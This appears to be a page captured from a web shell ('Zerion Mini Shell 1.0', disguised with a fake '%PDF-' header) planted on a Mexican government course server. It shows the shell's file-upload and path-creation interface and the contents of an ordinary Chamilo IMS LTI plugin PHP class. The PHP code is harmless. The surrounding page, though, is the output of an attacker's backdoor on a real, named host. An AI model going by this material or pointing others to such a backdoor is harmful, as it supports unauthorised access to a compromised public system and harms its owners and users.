%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tjamichg/cursos.tjamich.gob.mx/plugin/ims_lti/src/
Upload File :
Create Path :
Current File : /home/tjamichg/cursos.tjamich.gob.mx/plugin/ims_lti/src/ImsLtiServiceReplaceResponse.php

<?php
/* For licensing terms, see /license.txt */

/**
 * Class ImsLtiReplaceServiceResponse.
 */
class ImsLtiServiceReplaceResponse extends ImsLtiServiceResponse
{
    /**
     * ImsLtiServiceReplaceResponse constructor.
     *
     * @param mixed|null $bodyParam
     */
    public function __construct(ImsLtiServiceResponseStatus $statusInfo, $bodyParam = null)
    {
        $statusInfo->setOperationRefIdentifier('replaceResult');

        parent::__construct($statusInfo, $bodyParam);
    }

    protected function generateBody(SimpleXMLElement $xmlBody)
    {
        $xmlBody->addChild('replaceResultResponse');
    }
}

Zerion Mini Shell 1.0